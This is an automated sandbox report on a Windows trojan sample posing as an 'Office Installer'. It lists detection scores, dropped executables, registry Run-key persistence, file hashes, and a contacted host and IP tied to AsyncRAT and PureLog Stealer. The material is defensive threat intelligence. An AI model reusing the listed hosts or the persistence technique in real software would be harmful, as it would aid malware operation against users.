C:\Users\user\AppData\Roaming\Lxfrfbi.exe	100%	Joe Sandbox ML
C:\Users\user\AppData\Local\Vulvvmkewji.exe	100%	Joe Sandbox ML
C:\Users\user\AppData\Local\Temp\Office Installer.exe	71%	ReversingLabs	Win64.Trojan.Acll
C:\Users\user\AppData\Local\Temp\Office Installer.exe	50%	Virustotal		Browse
C:\Users\user\AppData\Local\Vulvvmkewji.exe	63%	ReversingLabs	Win32.Trojan.Generic
C:\Users\user\AppData\Local\Vulvvmkewji.exe	64%	Virustotal		Browse
C:\Users\user\AppData\Roaming\Lxfrfbi.exe	63%	ReversingLabs	Win32.Trojan.Generic
C:\Users\user\AppData\Roaming\Lxfrfbi.exe	64%	Virustotal		Browse

Unpacked PE Files

⊘No Antivirus matches

Domains

Source	Detection	Scanner	Label	Link
windowsupdatebg.s.llnwi.net	0%	Virustotal		Browse

URLs

Source	Detection	Scanner	Label	Link
http://pesterbdd.com/images/Pester.png	100%	URL Reputation	malware
http://crl.microsoft	0%	URL Reputation	safe
https://go.micro	0%	URL Reputation	safe
http://ocsp.thawte.com0	0%	URL Reputation	safe
https://contoso.com/License	0%	URL Reputation	safe
https://contoso.com/Icon	0%	URL Reputation	safe
https://contoso.com/	0%	URL Reputation	safe
https://oneget.orgX	0%	URL Reputation	safe
https://oneget.org	0%	URL Reputation	safe
5512.sytes.net	0%	Avira URL Cloud	safe
https://msfree.su/donaties/donations.html	100%	Avira URL Cloud	malware
5512.sytes.net	3%	Virustotal		Browse
https://msfree.su/donaties/donations.html	0%	Virustotal		Browse

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Antivirus Detection	Reputation
windowsupdatebg.s.llnwi.net	208.111.186.128	true	false	0%, Virustotal, Browse	unknown

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
5512.sytes.net	true	3%, Virustotal, Browse Avira URL Cloud: safe	unknown

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
http://nuget.org/NuGet.exe	powershell.exe, 00000001.00000002.1917313694.000000000634B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2224441917.000002B410075000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1764715241.000002B4018F3000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2224441917.000002B4101B8000.00000004.00000800.00020000.00000000.sdmp	false		high
http://www.apache.org/licenses/LICENSE-2.0	powershell.exe, 00000008.00000002.1764715241.000002B401659000.00000004.00000800.00020000.00000000.sdmp	false		high
http://www.vmware.com/0	Gm602axA2d.exe, 00000000.00000002.1681159516.0000000004DDD000.00000004.00000020.00020000.00000000.sdmp, Office Installer.exe, 00000004.00000002.2915851514.00007FF6C80E9000.00000008.00000001.01000000.00000009.sdmp, Office Installer.exe, 00000004.00000000.1671786715.00007FF6C80E9000.00000008.00000001.01000000.00000009.sdmp	false		high
https://stackoverflow.com/q/14436606/23354	Vulvvmkewji.exe, 00000003.00000002.1818612437.0000000007381000.00000004.00000800.00020000.00000000.sdmp, Vulvvmkewji.exe, 00000003.00000002.1722917882.0000000003579000.00000004.00000800.00020000.00000000.sdmp, Vulvvmkewji.exe, 00000003.00000002.1722917882.0000000003479000.00000004.00000800.00020000.00000000.sdmp, Vulvvmkewji.exe, 00000003.00000002.1818612437.0000000007451000.00000004.00000800.00020000.00000000.sdmp, Vulvvmkewji.exe, 00000003.00000002.2090595290.0000000007AF0000.00000004.08000000.00040000.00000000.sdmp, Lxfrfbi.exe, 0000000C.00000002.1931713295.0000000003269000.00000004.00000800.00020000.00000000.sdmp, Lxfrfbi.exe, 0000000C.00000002.1931713295.0000000003169000.00000004.00000800.00020000.00000000.sdmp, Lxfrfbi.exe, 00000010.00000002.2101694396.0000000003AF5000.00000004.00000800.00020000.00000000.sdmp, Lxfrfbi.exe, 00000010.00000002.2101694396.00000000039F5000.00000004.00000800.00020000.00000000.sdmp	false		high
https://github.com/mgravell/protobuf-netJ	Vulvvmkewji.exe, 00000003.00000002.1818612437.0000000007381000.00000004.00000800.00020000.00000000.sdmp, Vulvvmkewji.exe, 00000003.00000002.1722917882.0000000003479000.00000004.00000800.00020000.00000000.sdmp, Vulvvmkewji.exe, 00000003.00000002.1818612437.0000000007451000.00000004.00000800.00020000.00000000.sdmp, Vulvvmkewji.exe, 00000003.00000002.2090595290.0000000007AF0000.00000004.08000000.00040000.00000000.sdmp, Lxfrfbi.exe, 0000000C.00000002.2181412356.0000000007047000.00000004.00000800.00020000.00000000.sdmp, Lxfrfbi.exe, 0000000C.00000002.1931713295.0000000003169000.00000004.00000800.00020000.00000000.sdmp, Lxfrfbi.exe, 00000010.00000002.2248433326.0000000007907000.00000004.00000800.00020000.00000000.sdmp, Lxfrfbi.exe, 00000010.00000002.2101694396.00000000039F5000.00000004.00000800.00020000.00000000.sdmp	false		high
http://pesterbdd.com/images/Pester.png	powershell.exe, 00000008.00000002.1764715241.000002B401896000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1764715241.000002B401659000.00000004.00000800.00020000.00000000.sdmp	true	URL Reputation: malware	unknown
http://schemas.xmlsoap.org/soap/encoding/	powershell.exe, 00000001.00000002.1769593874.0000000005436000.00000004.00000800.00020000.00000000.sdmp	false		high
http://crl.microsoft	powershell.exe, 00000001.00000002.2099977304.00000000089E2000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://www.apache.org/licenses/LICENSE-2.0.html	powershell.exe, 00000008.00000002.1764715241.000002B401896000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1764715241.000002B401659000.00000004.00000800.00020000.00000000.sdmp	false		high
https://go.micro	powershell.exe, 00000008.00000002.1764715241.000002B400C31000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://ocsp.thawte.com0	Gm602axA2d.exe, 00000000.00000002.1681159516.0000000004DDD000.00000004.00000020.00020000.00000000.sdmp, Office Installer.exe, 00000004.00000002.2915851514.00007FF6C80E9000.00000008.00000001.01000000.00000009.sdmp, Office Installer.exe, 00000004.00000000.1671786715.00007FF6C80E9000.00000008.00000001.01000000.00000009.sdmp	false	URL Reputation: safe	unknown
https://contoso.com/License	powershell.exe, 00000008.00000002.2224441917.000002B4101B8000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://contoso.com/Icon	powershell.exe, 00000008.00000002.2224441917.000002B4101B8000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://github.com/mgravell/protobuf-net	Vulvvmkewji.exe, 00000003.00000002.1818612437.0000000007381000.00000004.00000800.00020000.00000000.sdmp, Vulvvmkewji.exe, 00000003.00000002.1722917882.0000000003479000.00000004.00000800.00020000.00000000.sdmp, Vulvvmkewji.exe, 00000003.00000002.1818612437.0000000007451000.00000004.00000800.00020000.00000000.sdmp, Vulvvmkewji.exe, 00000003.00000002.2090595290.0000000007AF0000.00000004.08000000.00040000.00000000.sdmp, Lxfrfbi.exe, 0000000C.00000002.1931713295.0000000003169000.00000004.00000800.00020000.00000000.sdmp, Lxfrfbi.exe, 00000010.00000002.2101694396.00000000039F5000.00000004.00000800.00020000.00000000.sdmp	false		high
https://github.com/Pester/Pester	powershell.exe, 00000008.00000002.1764715241.000002B401896000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1764715241.000002B401659000.00000004.00000800.00020000.00000000.sdmp	false		high
https://msfree.su/donaties/donations.html	Gm602axA2d.exe, 00000000.00000002.1681159516.0000000004DDD000.00000004.00000020.00020000.00000000.sdmp, Office Installer.exe, 00000004.00000002.2915851514.00007FF6C80E9000.00000008.00000001.01000000.00000009.sdmp, Office Installer.exe, 00000004.00000000.1671786715.00007FF6C80E9000.00000008.00000001.01000000.00000009.sdmp	false	0%, Virustotal, Browse Avira URL Cloud: malware	unknown
https://github.com/mgravell/protobuf-neti	Vulvvmkewji.exe, 00000003.00000002.1818612437.0000000007381000.00000004.00000800.00020000.00000000.sdmp, Vulvvmkewji.exe, 00000003.00000002.1722917882.0000000003479000.00000004.00000800.00020000.00000000.sdmp, Vulvvmkewji.exe, 00000003.00000002.1818612437.0000000007451000.00000004.00000800.00020000.00000000.sdmp, Vulvvmkewji.exe, 00000003.00000002.2090595290.0000000007AF0000.00000004.08000000.00040000.00000000.sdmp, Lxfrfbi.exe, 0000000C.00000002.1931713295.0000000003169000.00000004.00000800.00020000.00000000.sdmp, Lxfrfbi.exe, 00000010.00000002.2101694396.00000000039F5000.00000004.00000800.00020000.00000000.sdmp	false		high
http://crl.thawte.com/ThawteTimestampingCA.crl0	Gm602axA2d.exe, 00000000.00000002.1681159516.0000000004DDD000.00000004.00000020.00020000.00000000.sdmp, Office Installer.exe, 00000004.00000002.2915851514.00007FF6C80E9000.00000008.00000001.01000000.00000009.sdmp, Office Installer.exe, 00000004.00000000.1671786715.00007FF6C80E9000.00000008.00000001.01000000.00000009.sdmp	false		high
https://aka.ms/pscore6lB	powershell.exe, 00000001.00000002.1769593874.00000000052E1000.00000004.00000800.00020000.00000000.sdmp	false		high
https://stackoverflow.com/q/11564914/23354;	Vulvvmkewji.exe, 00000003.00000002.1818612437.0000000007381000.00000004.00000800.00020000.00000000.sdmp, Vulvvmkewji.exe, 00000003.00000002.1722917882.0000000003479000.00000004.00000800.00020000.00000000.sdmp, Vulvvmkewji.exe, 00000003.00000002.1818612437.0000000007451000.00000004.00000800.00020000.00000000.sdmp, Vulvvmkewji.exe, 00000003.00000002.2090595290.0000000007AF0000.00000004.08000000.00040000.00000000.sdmp, Lxfrfbi.exe, 0000000C.00000002.1931713295.0000000003169000.00000004.00000800.00020000.00000000.sdmp, Lxfrfbi.exe, 00000010.00000002.2101694396.00000000039F5000.00000004.00000800.00020000.00000000.sdmp	false		high
https://stackoverflow.com/q/2152978/23354	Vulvvmkewji.exe, 00000003.00000002.1818612437.0000000007381000.00000004.00000800.00020000.00000000.sdmp, Vulvvmkewji.exe, 00000003.00000002.1818612437.0000000007451000.00000004.00000800.00020000.00000000.sdmp, Vulvvmkewji.exe, 00000003.00000002.2090595290.0000000007AF0000.00000004.08000000.00040000.00000000.sdmp	false		high
http://schemas.xmlsoap.org/wsdl/	powershell.exe, 00000001.00000002.1769593874.0000000005436000.00000004.00000800.00020000.00000000.sdmp	false		high
https://contoso.com/	powershell.exe, 00000008.00000002.2224441917.000002B4101B8000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://nuget.org/nuget.exe	powershell.exe, 00000001.00000002.1917313694.000000000634B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2224441917.000002B410075000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1764715241.000002B4018F3000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2224441917.000002B4101B8000.00000004.00000800.00020000.00000000.sdmp	false		high
https://oneget.orgX	powershell.exe, 00000008.00000002.1764715241.000002B401659000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://aka.ms/pscore68	powershell.exe, 00000008.00000002.1764715241.000002B400001000.00000004.00000800.00020000.00000000.sdmp	false		high
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name	powershell.exe, 00000001.00000002.1769593874.00000000052E1000.00000004.00000800.00020000.00000000.sdmp, Vulvvmkewji.exe, 00000003.00000002.1722917882.000000000367C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1764715241.000002B400001000.00000004.00000800.00020000.00000000.sdmp, AppLaunch.exe, 0000000A.00000002.2920632986.00000000068F1000.00000004.00000800.00020000.00000000.sdmp, Lxfrfbi.exe, 0000000C.00000002.1931713295.000000000336C000.00000004.00000800.00020000.00000000.sdmp, Lxfrfbi.exe, 00000010.00000002.2101694396.0000000003BF6000.00000004.00000800.00020000.00000000.sdmp	false		high
https://oneget.org	powershell.exe, 00000008.00000002.1764715241.000002B401659000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	Flag	ASN	ASN Name	Malicious
95.211.208.153	unknown	Netherlands		60781	LEASEWEB-NL-AMS-01NetherlandsNL	true

General Information

Joe Sandbox version:	40.0.0 Tourmaline
Analysis ID:	1433165
Start date and time:	2024-04-29 10:21:09 +02:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 9m 10s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed:	19
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample name:	Gm602axA2d.exe renamed because original name is a hash value
Original Sample Name:	2d25ca067a272bd8542cabe1ff9985d1.exe
Detection:	MAL
Classification:	mal100.troj.evad.winEXE@23/17@0/1
EGA Information:	Successful, ratio: 10%
HCA Information:	Successful, ratio: 65% Number of executed functions: 521 Number of non-executed functions: 11
Cookbook Comments:	Found application associated with file extension: .exe

Warnings

Exclude process from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, SIHClient.exe, conhost.exe
Excluded IPs from analysis (whitelisted): 52.109.6.4, 208.111.186.128
Excluded domains from analysis (whitelisted): prod.mrodevicemgr.live.com.akadns.net, ocsp.digicert.com, slscr.update.microsoft.com, mrodevicemgr.officeapps.live.com, ctldl.windowsupdate.com, wu-bg-shim.trafficmanager.net, fe3cr.delivery.mp.microsoft.com
Execution Graph export aborted for target AppLaunch.exe, PID 7432 because it is empty
Execution Graph export aborted for target AppLaunch.exe, PID 7608 because it is empty
Execution Graph export aborted for target AppLaunch.exe, PID 8084 because it is empty
Execution Graph export aborted for target Lxfrfbi.exe, PID 7936 because it is empty
Execution Graph export aborted for target Lxfrfbi.exe, PID 8140 because it is empty
Execution Graph export aborted for target Office Installer.exe, PID 7336 because there are no executed function
Execution Graph export aborted for target Vulvvmkewji.exe, PID 7280 because it is empty
Execution Graph export aborted for target powershell.exe, PID 2004 because it is empty
Execution Graph export aborted for target powershell.exe, PID 7540 because it is empty
Not all processes where analyzed, report is missing behavior information
Report size exceeded maximum capacity and may have missing behavior information.
Report size getting too big, too many NtAllocateVirtualMemory calls found.
Report size getting too big, too many NtCreateKey calls found.
Report size getting too big, too many NtOpenKeyEx calls found.
Report size getting too big, too many NtProtectVirtualMemory calls found.
Report size getting too big, too many NtQueryValueKey calls found.

Simulations

Behavior and APIs

Time	Type	Description
09:22:05	Autostart	Run: HKCU\Software\Microsoft\Windows\CurrentVersion\Run Lxfrfbi C:\Users\user\AppData\Roaming\Lxfrfbi.exe
09:22:19	Autostart	Run: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run Lxfrfbi C:\Users\user\AppData\Roaming\Lxfrfbi.exe
10:21:56	API Interceptor	33x Sleep call for process: powershell.exe modified
10:22:16	API Interceptor	1x Sleep call for process: AppLaunch.exe modified

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
95.211.208.153	jh3lXSnrfk.exe	Get hash	malicious	AsyncRAT, PureLog Stealer	Browse

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
windowsupdatebg.s.llnwi.net	7JJXhSsMRy.exe	Get hash	malicious	PureLog Stealer, RedLine, SectopRAT, Stealc, zgRAT	Browse	208.111.186.128
	c2zykY3l1Z.exe	Get hash	malicious	Mars Stealer, PureLog Stealer, RedLine, SectopRAT, Stealc, Vidar, zgRAT	Browse	208.111.186.128
	qMcJV8jGtE.exe	Get hash	malicious	PureLog Stealer, RedLine, SectopRAT, zgRAT	Browse	208.111.186.128
	TF8QWXO6gr.exe	Get hash	malicious	Mars Stealer, PureLog Stealer, RedLine, SectopRAT, Stealc, Vidar, zgRAT	Browse	208.111.186.128
	xSqgmhuhbX.exe	Get hash	malicious	Mars Stealer, PureLog Stealer, RedLine, SectopRAT, Stealc, Vidar, zgRAT	Browse	208.111.186.128
	https://amzaon.co.hzxpel.com/660ebca95ab13	Get hash	malicious	Unknown	Browse	208.111.186.128
	https://pub-d90b4e6b37254e1687ebe94c4d177a68.r2.dev/ADOBE%281%29.html	Get hash	malicious	HTMLPhisher	Browse	208.111.186.0
	https://aeom.suzhouweixingdianshi.com/?cwwjri3q	Get hash	malicious	Unknown	Browse	208.111.186.128
	clik.exe	Get hash	malicious	CredGrabber, PureLog Stealer	Browse	69.164.0.0
	TIBNfj14Wd.exe	Get hash	malicious	Mars Stealer, PureLog Stealer, RedLine, SectopRAT, Stealc, Vidar, zgRAT	Browse	69.164.0.128

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
LEASEWEB-NL-AMS-01NetherlandsNL	jh3lXSnrfk.exe	Get hash	malicious	AsyncRAT, PureLog Stealer	Browse	95.211.208.153
	SecuriteInfo.com.Program.Unwanted.5215.4772.1835.exe	Get hash	malicious	PureLog Stealer	Browse	5.79.122.22
	SecuriteInfo.com.Program.Unwanted.5215.4772.1835.exe	Get hash	malicious	PureLog Stealer	Browse	5.79.122.22
	dekont_20240423_388993774837743.exe	Get hash	malicious	AgentTesla	Browse	93.190.220.113
	SecuriteInfo.com.Trojan.InstallCore.4086.15026.2213.exe	Get hash	malicious	PrivateLoader, PureLog Stealer	Browse	89.149.222.197
	SecuriteInfo.com.Trojan.InstallCore.4086.15026.2213.exe	Get hash	malicious	PrivateLoader, PureLog Stealer	Browse	95.211.112.23
	BitTorrent-7.6.exe	Get hash	malicious	Unknown	Browse	83.149.84.137
	rc21AW1MZD.elf	Get hash	malicious	Mirai	Browse	85.17.43.9
	20240417_28773667376643.exe	Get hash	malicious	AgentTesla	Browse	93.190.220.113
	0d#Uff09.exe	Get hash	malicious	Unknown	Browse	5.79.122.22

JA3 Fingerprints

⊘No context

Dropped Files

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
C:\Users\user\AppData\Local\Vulvvmkewji.exe	jh3lXSnrfk.exe	Get hash	malicious	AsyncRAT, PureLog Stealer	Browse
C:\Users\user\AppData\Roaming\Lxfrfbi.exe	jh3lXSnrfk.exe	Get hash	malicious	AsyncRAT, PureLog Stealer	Browse

Created / dropped Files

C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\77EC63BDA74BD0D0E0426DC8F8008506

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
File Type:	Microsoft Cabinet archive data, Windows 2000/XP setup, 69993 bytes, 1 file, at 0x2c +A "authroot.stl", number 1, 6 datablocks, 0x1 compression
Category:	dropped
Size (bytes):	69993
Entropy (8bit):	7.99584879649948
Encrypted:	true
SSDEEP:	1536:iMveRG6BWC7T2g1wGUa5QUoaIB9ttiFJG+AOQOXl0Usvwr:feRG6BX6gUaHo9tkBHiUewr
MD5:	29F65BA8E88C063813CC50A4EA544E93
SHA1:	05A7040D5C127E68C25D81CC51271FFB8BEF3568
SHA-256:	1ED81FA8DFB6999A9FEDC6E779138FFD99568992E22D300ACD181A6D2C8DE184
SHA-512:	E29B2E92C496245BED3372578074407E8EF8882906CE10C35B3C8DEEBFEFE01B5FD7F3030ACAA693E175F4B7ACA6CD7D8D10AE1C731B09C5FA19035E005DE3AA
Malicious:	false
Preview:	MSCF....i.......,...................I.................oXAy .authroot.stl.Ez..Q6..CK..<Tk...p.k..1...3...[..%Y.f..."K.6)..[I.hOB."..rK.RQ..}f..f...}....9.\|.....gA...30.,O2L...0..%.U...U.t.....`dqM2.x..t...<(uad.c...x5V.x..t..agd.v......i...KD..q(. ...JJ......#..'=. ...3.x...}...+T.K..!.'.`w .!.x.r.......YafhG..O.3....'P[..'.D../....n..t....R<..=\E7L0?{..T.f...ID...,...r....3z..O/.b.Iwx.. .o...a\.s........."..'.......<;s.[...l...6.)ll..B.P.....k.... k0.".t!/.,........{...P8....B..0(.. .Q.....d...q,\.$.n.Q.\.p...R..:.hr./..8.S<a.s...+#3....D..h1.a.0....{.9.....:e.......n.~G.{.M.1..OU.....B.Q..y_>.P{...}i.=.a..QQT.U..\|!.pyCD@.....l..70..w..)...W^.`l...%Y.\................i..=hYV.O8W@P.=.r.=..1m..1....)\.p..\|.c.3..t..[...).....l.{.Y....\S.....y....[.mCt....Js;...H....Q..F.....g.O...[..A.=...F[..z....k...mo.lW{`....O...T.g.Y.Uh.;m.'.N..f..}4..9i..t4p_bI..`.....Ie..l.P.... ...Lg......[....5g...~D.s.h'>n.m.c.7...-..P.gG...i$...v.m.b[.yO.P/*.YH.

C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\77EC63BDA74BD0D0E0426DC8F8008506

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
File Type:	data
Category:	dropped
Size (bytes):	290
Entropy (8bit):	2.9611292441338923
Encrypted:	false
SSDEEP:	6:kKbrqlbN+SkQlPlEGYRMY9z+4KlDA3RUe/:PqlUkPlE99SNxAhUe/
MD5:	C168FB8F4F2D2ACAF456DA55122FEE9A
SHA1:	0F88B8EF89A5496D87B22140716DEBF94B5486A2
SHA-256:	074E4F2BC3942A894450EDA170881C8AD53D6A0059D9DDE48476B5D9458DF61A
SHA-512:	FAF6C0CE78334C4A88A952CF9C18C804720295851F4BE381E702DBE745AB911139E0BCF54E513BBCBD4CE2848F461F91FCAA7905A0516B78CF0EEEBB48072242
Malicious:	false
Preview:	p...... ..........qX....(....................................................... ........M.....................i...h.t.t.p.:././.c.t.l.d.l...w.i.n.d.o.w.s.u.p.d.a.t.e...c.o.m./.m.s.d.o.w.n.l.o.a.d./.u.p.d.a.t.e./.v.3./.s.t.a.t.i.c./.t.r.u.s.t.e.d.r./.e.n./.a.u.t.h.r.o.o.t.s.t.l...c.a.b...

C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\AppLaunch.exe.log

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
File Type:	CSV text
Category:	dropped
Size (bytes):	425
Entropy (8bit):	5.353683843266035
Encrypted:	false
SSDEEP:	12:Q3La/KDLI4MWuPTAOKbbDLI4MWuPJKAVKhav:ML9E4KlKDE4KhKiKhk
MD5:	859802284B12C59DDBB85B0AC64C08F0
SHA1:	4FDDEFC6DB9645057FEB3322BE98EF10D6A593EE
SHA-256:	FB234B6DAB715ADABB23E450DADCDBCDDFF78A054BAF19B5CE7A9B4206B7492B
SHA-512:	8A371F671B962AE8AE0F58421A13E80F645FF0A9888462C1529B77289098A0EA4D6A9E2E07ABD4F96460FCC32AA87B0581CA4D747E77E69C3620BF1368BA9A67
Malicious:	false
Preview:	1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..

C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\Lxfrfbi.exe.log

Download File

Process:	C:\Users\user\AppData\Roaming\Lxfrfbi.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	1022
Entropy (8bit):	5.354120267532675
Encrypted:	false
SSDEEP:	24:MLV1qE4qpE4KiE4K5AE4KzecKDE4KhKiKhBsXE4qdKm:Mp1qH2HKiHK5AHKzecYHKh3okHA
MD5:	5066991BA640F7028EF67363E03E3FAF
SHA1:	FE554CA50DA35D73499DDC56D280FBC967D8B9D5
SHA-256:	0AF5FE7D99D48096EC6FD05C9A216DEA2B00AEFA51C4CBDA6475E7592DDCD4D0
SHA-512:	1E5B11E7484695C46BBB5E6D88F0875E48C53E825DB05194972C07AECDA9393742AA9079950BC9775EE418BE477E83F25EA8FA9CBA3DA76A3A5BFAA7EC5A445B
Malicious:	false
Preview:	1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\2062ed810929ec0e33254c02b0c61bb4\System.Xml.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..3,"System.Management, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Management\96012833bebd5f21714fc508603cda97\System.

C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\Vulvvmkewji.exe.log

Download File

Process:	C:\Users\user\AppData\Local\Vulvvmkewji.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	1022
Entropy (8bit):	5.354120267532675
Encrypted:	false
SSDEEP:	24:MLV1qE4qpE4KiE4K5AE4KzecKDE4KhKiKhBsXE4qdKm:Mp1qH2HKiHK5AHKzecYHKh3okHA
MD5:	5066991BA640F7028EF67363E03E3FAF
SHA1:	FE554CA50DA35D73499DDC56D280FBC967D8B9D5
SHA-256:	0AF5FE7D99D48096EC6FD05C9A216DEA2B00AEFA51C4CBDA6475E7592DDCD4D0
SHA-512:	1E5B11E7484695C46BBB5E6D88F0875E48C53E825DB05194972C07AECDA9393742AA9079950BC9775EE418BE477E83F25EA8FA9CBA3DA76A3A5BFAA7EC5A445B
Malicious:	false
Preview:	1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\2062ed810929ec0e33254c02b0c61bb4\System.Xml.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..3,"System.Management, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Management\96012833bebd5f21714fc508603cda97\System.

C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	data
Category:	dropped
Size (bytes):	64
Entropy (8bit):	1.1940658735648508
Encrypted:	false
SSDEEP:	3:NlllulFlz:NllUf
MD5:	16D8A7BE440D46BEDCC37C8F9D4E4593
SHA1:	B8DA9BE23D28A0B37302011579353193FD3BA566
SHA-256:	761C903C5866AB1A9D3B2FDB6A42BD52B825277CB44E6703C634449AFFDF6460
SHA-512:	02F634ECD03EDA05E73C5B412F7FB9F919F9C6343141E56DE38628FAF1475FE3048D21D7764C012A9A1BACFDA69C533DC7FB86ECCF63588239C90607546FFFE3
Malicious:	false
Preview:	@...e................................................@..........

C:\Users\user\AppData\Local\Temp\Office Installer.exe

Download File

Process:	C:\Users\user\Desktop\Gm602axA2d.exe
File Type:	PE32+ executable (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	10075648
Entropy (8bit):	7.284254498665596
Encrypted:	false
SSDEEP:	196608:wYPvMWhoL83tLLMhYABg6AiQBhyQbEAkZQdnkW9AVSGfGIJXkaI6HMaJTtGb:wYPvMWhg6LOtBzyyu4JfdJX
MD5:	6B9D8041B99E48CAAF20261DFBCB787F
SHA1:	E58BFB89C22361E7C9274432F8B4CB0B43B514E0
SHA-256:	5943A1E15E8919235C07BFE2C997C6D9537F253B8C7300972CDA1A545810D227
SHA-512:	0EBFC48003079C44D3906DE58AA84A7C8E9318935C1E17137059161711CE5A01B5955DAFD9CD678576B5AD9E7035A0F35A3EA70C63721BB1F3B9920CE257CF19
Malicious:	true
Yara Hits:	Rule: JoeSecurity_ProcessChecker, Description: Yara detected ProcessChecker, Source: C:\Users\user\AppData\Local\Temp\Office Installer.exe, Author: Joe Security
Antivirus:	Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: ReversingLabs, Detection: 71% Antivirus: Virustotal, Detection: 50%, Browse
